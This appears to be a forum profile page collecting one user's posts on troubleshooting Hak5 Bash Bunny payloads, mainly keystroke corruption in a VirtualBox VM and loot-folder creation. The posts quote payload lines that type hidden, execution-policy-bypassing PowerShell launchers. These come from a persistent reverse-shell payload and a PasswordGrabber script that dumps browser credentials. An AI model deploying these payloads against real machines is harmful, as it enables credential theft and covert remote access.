Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

About OblivionX

  • Rank

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Hi Bob! It seems that this is a hardware issue.... I didn't try anything else, I think we tried everything about this, but the good thing is that my Vmware VM works! Thanks again for the support, and now we can close this topic! 😄
  2. Bob123, you really helped me! I spent some time to know that I would have to use extension pack too, so I had a n00b momento too =). I tried Usb 2.0 with no success... Maybe my RAM/Processor speed is somehow fast enought for bunny? I am using Nvme too, so idk if this can change something for the VM speed....If you have success with the same VM (20 gig) and 3.0, the problem is not VirtualBox driver, it will be something else that I don't know....
  3. Bob, I tested with VMware and it really works! Conclusion: There's something wrong with VirtualBox USB driver, Vmware works 100%! Thank you, I wouldn't try Vmware without your support! If you get the same conclusion about VirtualBox please tell me so I will know if the problem happens only with me.
  4. I will try with Vmware. For Virtualbox you have to download a windows 10 developer VM, and after you download virtual box and virtual box extension pack to enable USB 3.0 and thats it! If you can do it, I will try vmware and we both can double check this problem.
  5. Yes, this is the real output, and it changes somehow everytime I use my bashbunny again, like the photo. You can see that the word "NAME" was NAM before, and now is "AME". I started to break the string in peaces, to see if the end of the string would become 100% ok, look: Command on PC: RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" Output 100% OK: Powershell -nop -ex Bypass -w Hidden .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\run.ps1') Now on VM you will see that the output will become better each time I reduce the string (green part is ok, red is wrong. The commands are broken, but I made this just to test the output). Command: RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" Output: Powershell -nop -ex Bypass -w Hidden .((gwmi win32_VOLUME _F "LABE""BSHBUNNY""">NAM+"PAYOADS|SWITCH!|RUN>PS!") Command: RUN WIN Powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" Output: Powershell .((gwmi win32_volume -f 'label=''BASHBNNY""")NME+"PAYLOADS|SWITCH!|RUN>PS!") Command: RUN WIN Powershell ".(('label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" Output: Powershell .(('label=''BashBunny''').NME+PAYLOAS|SWITCH!|RUN>PS!") So as you can see, the smaller the string is, it reaches the end better, but still with output error, and a kind of random error, as shown in the picture. I am very convinced that this is a VM buffer problem. I've tried QUAK DELAY before the command, no progress... I think the real solution would be something like the String_Delay as shown in the old topic on my first post, but I need something like it for BashBunny.
  6. Hello all, I am having some trouble with my bashbunny on windows 10 VirtualBox VM. When I use a WindowsPersistentReverseShell payload, the output on run.exe is not right: LED ATTACK RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" LED FINISH The output should be: Powershell -nop -ex Bypass -w Hidden .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\run.ps1') But this is how it appears on my Windows 10 VM: Powershell -nop -ex Bypass -w Hidden .((gwmi win32_VOLUME _F "LABE""BSHBUNNY""">NAM+"PAYOADS|SWITCH!|RUN>PS!") I'm using virtual box 6.1.8 r137981 (Qt5.6.2), USB 3.0 driver, Windows 10 and bashbunny US language. When I test this payload on my windows 10 machine (not vm) everything goes perfect. I also read in some old forums about slowing down keystrokes in RubbeDucky Strings because of VM buffer issues: I think this is the problem, but the String_Delay that solves the problem on RubberDucky doesn't work in BashBunny, or I am not using this correctly. Does anybody know how to solve this issue?
  7. I tried to mkdir before the ATTACKMODE , and it works! I did it before your post hehehe, but I had to wait 24 hours to post again hehe.... I saw that there's a pull request of PasswordGraber V2 and the position of ATTACKMODE has changed, right after mkdir. I still want to know why this doesn't happen with ATTACKMODE RNDIS_EHTERNET. With this kind of attackmode I can create folders after ATTACKMODE with no problem, like QuickCreds.....
  8. You can use the Bash Bunny Updater to get all the language files!
  9. Is Firefox working for you? I can only see the Creds Dumped from Chrome....
  10. I've found that, if I use ATTACKMODE only, with no mode , before the mkdir command, and right after mkdir I use ATTACKMODE HID STORAGE, the problems is solved too...example in password grabber: # Options LOOTDIR=/root/udisk/loot/PasswordGrabber ######## INITIALIZATION ######## LED SETUP GET SWITCH_POSITION ATTACKMODE # <----------------------------------------------------------THIS SOLVED THE ISSUE (ATTACKMODE HID STORAGE WAS HERE IN THE ORIGINAL PAYLOAD) ######## MAKE LOOT DIRECTORY ######## # Setup named logs in loot directory mkdir -p $LOOTDIR ######## ATTACK ######## ATTACKMODE HID STORAGE <---------------------------------- NOW I SET THE ATACKMODE HID STORAGE LED ATTACK RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')" # Wait until passwords are grabbed. sleep 25 ######## FINISH ######## LED FINISH
  11. I'm using the latest firmware (1.5_298) , I did the Bash Bunny reset procedure (unplug 3 times ,etc etc), did the "udisk reformat" and updated everything wit Bash Bunny Updater. The payloads are working, the issue above is the only annoying thing.
  12. Hi! I've started using the bash bunny and I've noticed that when I use a payload that uses ATTACKMODE HID STORAGE and use the mkdir command to create a folder inside the loot foolder (PasswordGrabber and WiPassDump for example), I can't see the folder created by them on the first time. If I change to arming mode and check, the folder appears but empty (and it only appears in arming mode, if i run the first time the payload and dont remove the Bash Bunny, it wont appear)! If i run the payload again, now that the folder is already created (the folder now appears on switch 1 or 2 ) everything works ok. If I create manually the folder inside the loot folder for the payload, it will work too on the first time. All that I said is related to ATTACKMODE HID STORAGE, because if I use a payload like QuickCreds, it will create its folder inside loot folder and everything works in the first time! If I change the ATTACKMODE in PasswordGrabber and WiPassDump to ATTACKMODE RNDIS_ETHERNET before the "mkdir" comand and then use ATTACKMODE HID STORAGE again right after the "mkdir" command, then these payloads will work for the first time too!! So is there any problem with ATTACKMODE HID STORAGE to create folder inside loot folder for the first time you run a payload? Why this is not happening with payloads that uses ATTACKMODE RNDIS_ETHERNET?
  • Create New...